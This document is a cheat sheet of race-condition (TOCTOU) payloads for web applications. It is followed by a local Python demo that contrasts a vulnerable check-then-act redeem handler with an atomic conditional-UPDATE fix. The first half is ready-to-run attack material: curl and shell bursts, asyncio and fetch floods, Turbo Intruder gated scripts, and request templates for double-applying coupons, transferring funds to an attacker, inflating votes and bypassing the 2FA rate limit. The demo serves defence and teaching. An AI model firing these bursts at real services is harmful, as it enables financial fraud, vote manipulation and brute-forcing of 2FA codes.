Race condition payloads for exploiting time-of-check to time-of-use (TOCTOU) bugs in web applications. (17 payloads)
# curl parallel transfers: every URL on the command line is requested, --parallel-max caps concurrency
curl --parallel --parallel-max 50 -X POST https://target/api/redeem -d "code=GIFT123" -H "Cookie: session=abc" url url url

# Shell loop: background each request, then wait for all of them to finish
for i in $(seq 1 100); do curl -s -X POST https://target/api/transfer -d "amount=1&to=attacker" -H "Cookie: sess=abc" & done; wait

# Python asyncio + aiohttp (url, payload and cookies are placeholders to fill in)
import asyncio, aiohttp
url, payload, cookies = "https://target/api/redeem", {"code": "GIFT123"}, {"session": "abc"}  # placeholders
async def race():
    async with aiohttp.ClientSession() as s:
        tasks = [s.post(url, data=payload, cookies=cookies) for _ in range(100)]  # build all, then send together
        return await asyncio.gather(*tasks)
asyncio.run(race())

# Browser console / Node fetch: 50 POSTs dispatched in one burst
Promise.all(Array(50).fill().map(() => fetch("/api/withdraw", {method: "POST", body: JSON.stringify({amount: 100}), headers: {"Content-Type": "application/json"}})))

# Turbo Intruder: 50 connections, one request each, gated so the final bytes are released together
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=50, requestsPerConnection=1, pipeline=False)
    for i in range(50):
        engine.queue(target.req, gate='race')
    engine.openGate('race')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

# Turbo Intruder: one connection, 50 pipelined requests (same handleResponse as above)
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=50, pipeline=True)
    for i in range(50):
        engine.queue(target.req)
    engine.complete(timeout=60)

# Turbo Intruder: 30 gated connections (same handleResponse as above)
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=1, pipeline=False)
    for i in range(30):
        engine.queue(target.req, gate='go')
    engine.openGate('go')
    engine.complete(timeout=60)

POST /api/coupon/apply
{"code": "DISCOUNT50"}
# Send 20x in parallel — coupon applied multiple times

POST /api/transfer
{"from": "attacker", "to": "victim", "amount": 100}
# Send 50x — balance may go negative

POST /api/vote
{"option": "A"}
# Send 100x — vote counted multiple times

POST /api/follow
{"user_id": 123}
# Send 30x — follower count inflated

POST /api/invite/accept
{"invite_id": "abc"}
# Send 10x — invite consumed but user added multiple times

POST /api/2fa/verify
{"code": "123456"}
# Send 20x with different codes — bypass rate limit on 2FA

# HTTP/2 multiplexing — all requests in a single TCP packet
# Use Burp's "Send group in parallel" or h2spacer
# Steps:
# 1. Capture request in Burp Repeater
# 2. Duplicate to 20 tabs
# 3. Select all → "Send group in parallel (single-packet attack)"

# h2spacer tool:
python3 h2spacer.py -u https://target/api/redeem -m POST -d "code=GIFT" -H "Cookie: s=abc" -t 50

# Signs a race condition exists:
# 1. Action is idempotent but has side effects (debit, credit, counter)
# 2. Check-then-act pattern without locking
# 3. "Already used" error on retry (but first batch succeeds)
# 4. Database uses READ COMMITTED (not SERIALIZABLE)
# 5. Response time varies under parallel load

# Verify: compare response bodies
# If 20/50 requests return success instead of 1/50,
# the endpoint is race-vulnerable
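The "check-then-act without locking" and isolation-level items above name the server-side defect that every payload on this sheet exercises. The Python script below is an added example, not code from this cheat sheet or from any real application: it models a redeem-once endpoint against a throwaway SQLite database, forces the interleaving that a parallel burst produces, and shows the check-then-act handler granting the code to every concurrent request while a handler that folds the check into one conditional UPDATE grants it exactly once. The `codes` table, the worker count, the `race()` driver and the reuse of the page's `GIFT123` value are constructed for the demonstration; SQLite stands in for whatever database a real service uses.

```python
"""Local model of a redeem-once endpoint, raced by N concurrent "requests".

Constructed example: the table, the seed row and the request simulation are
made up for this demonstration; SQLite stands in for the production database.
"""
import os
import sqlite3
import tempfile
import threading


def make_db() -> str:
    """Create a throwaway SQLite file holding one unredeemed code (constructed data)."""
    path = os.path.join(tempfile.mkdtemp(), "shop.db")
    conn = sqlite3.connect(path)
    with conn:  # commits the schema and the seed row
        conn.execute("CREATE TABLE codes (code TEXT PRIMARY KEY, used INTEGER NOT NULL)")
        conn.execute("INSERT INTO codes VALUES ('GIFT123', 0)")
    conn.close()
    return path


def redeem_check_then_act(path: str, code: str, barrier: threading.Barrier) -> bool:
    """Vulnerable handler: SELECT the flag, then UPDATE unconditionally.

    The barrier holds every worker after its check and before its act, which is
    the interleaving that a burst of parallel requests produces on a real server.
    """
    conn = sqlite3.connect(path, isolation_level=None, timeout=30)  # autocommit per statement
    try:
        rows = conn.execute("SELECT used FROM codes WHERE code = ?", (code,)).fetchall()
        barrier.wait(timeout=10)  # TOCTOU window: every check is done, no act has happened
        if not rows or rows[0][0]:
            return False          # "already used" (never reached here: every check saw 0)
        conn.execute("UPDATE codes SET used = 1 WHERE code = ?", (code,))
        return True               # reward granted
    finally:
        conn.close()


def redeem_atomic(path: str, code: str, barrier: threading.Barrier) -> bool:
    """Hardened handler: one conditional UPDATE performs the check and the act together.

    The database serializes writers, so only the first UPDATE still matches
    `used = 0`; rowcount tells the handler whether it won. A SELECT ... FOR UPDATE
    inside a transaction, or a SERIALIZABLE isolation level, gives the same
    guarantee on engines that support them.
    """
    conn = sqlite3.connect(path, isolation_level=None, timeout=30)
    try:
        barrier.wait(timeout=10)  # same burst pressure as the vulnerable handler
        cur = conn.execute("UPDATE codes SET used = 1 WHERE code = ? AND used = 0", (code,))
        return cur.rowcount == 1
    finally:
        conn.close()


def race(handler, workers: int = 20, code: str = "GIFT123") -> int:
    """Fire `workers` concurrent redemptions through `handler`; return how many were granted."""
    path = make_db()
    barrier = threading.Barrier(workers)
    granted = [False] * workers

    def run(i: int) -> None:
        granted[i] = handler(path, code, barrier)

    threads = [threading.Thread(target=run, args=(i,)) for i in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(granted)


if __name__ == "__main__":
    print("check-then-act granted:", race(redeem_check_then_act), "of 20")  # 20 of 20
    print("atomic update granted: ", race(redeem_atomic), "of 20")          # 1 of 20
```

Run it directly to see the two counts. The 20-of-50 versus 1-of-50 comparison in the verify step above is the black-box view of exactly this difference; on the server side the fix is to make the state change conditional on the state it was checked against (a conditional UPDATE, a row lock held across check and act, or a unique constraint or idempotency key on the side effect), not to add a rate limit in front of the handler.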